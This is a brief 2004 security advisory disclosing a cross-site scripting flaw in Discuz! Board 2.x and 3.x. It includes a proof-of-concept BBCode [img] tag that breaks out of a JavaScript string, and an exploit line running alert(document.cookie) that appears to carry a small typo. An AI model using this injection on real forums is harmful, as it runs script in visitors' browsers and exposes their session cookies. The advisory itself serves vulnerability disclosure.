Advisory Name:Possible Cross Site Scripting in Discuz! Board Release Date: Feb 5,2004 Application: Discuz! Board Version Affected: 2.x , 3.x Platform: PHP Severity: Low Discover: Cheng Peng Su(apple_soup_at_msn.com) Vendor URL: http://www.discuz.com/ ################################################ Proof Of Concept: A thread including: [img]http://a.gif');(xss code);a=escape('a[/img] will be So there will be a red 'x' instead of a normal pic,if visitor click the red 'x',the code will be executed. I think you know why i add " ;a=escape('a " after the xss code. Exploit: [img]http://a.gif');alert(document.cookie);a=escape=('a[/img]